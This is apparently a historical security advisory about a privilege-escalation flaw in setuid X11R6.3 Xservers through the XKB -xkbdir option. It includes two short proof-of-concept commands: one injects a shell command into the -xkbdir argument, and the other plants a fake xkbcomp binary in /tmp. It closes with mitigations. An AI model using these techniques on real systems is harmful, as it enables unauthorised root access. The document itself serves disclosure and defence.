COMMAND

    XKB

SYSTEMS AFFECTED

    Linux (others?)

PROBLEM

    Pavel Kankovsky posted following.  On a system where X11R6.3-based
    Xserver with XKEYBOARD extension  (R6.1 is probably affected  too)
    is  run  in  setuid  or  setgid  enviroment  (e.g. typical XFree86
    installation has  XF86_* installed  setuid root),  local users can
    exploit a  "feature" of  XKB implementation  to execute  arbitrary
    commands with the extra privileges.  In fact, there are (at least)
    two distict problems  in XKB implementation,  both related to  the
    use of -xkbdir option:

    1. xkbcomp is invoked using system() or popen()
       - any  shell metacharacters  included in  -xkbdir argument  are
         interpreted

        $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
        [exit X server]
        $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

    2. a user supplied instance of xkbcomp is invoked
       - xkbdir argument is used to build the path to the compiler

        $ cat > /tmp/xkbcomp
        #!/bin/sh
        id > /tmp/I_WAS_HERE
        [ctrl+d]
        $ chmod a+x /tmp/xkbcomp
        $ Xserver -xkbdir /tmp
        [X server executes /tmp/xkbcomp]

SOLUTION

    Quick fix:

        1. as usual chmod u-s,g-s all installed Xserver binaries (*)
        2. use xdm or a SAFE and PARANOID wrapper to start Xserver

        (*) and unsafe  or not-paranoid-enough setuid/setgid  wrappers
        (current Debian wrapper falls into this category)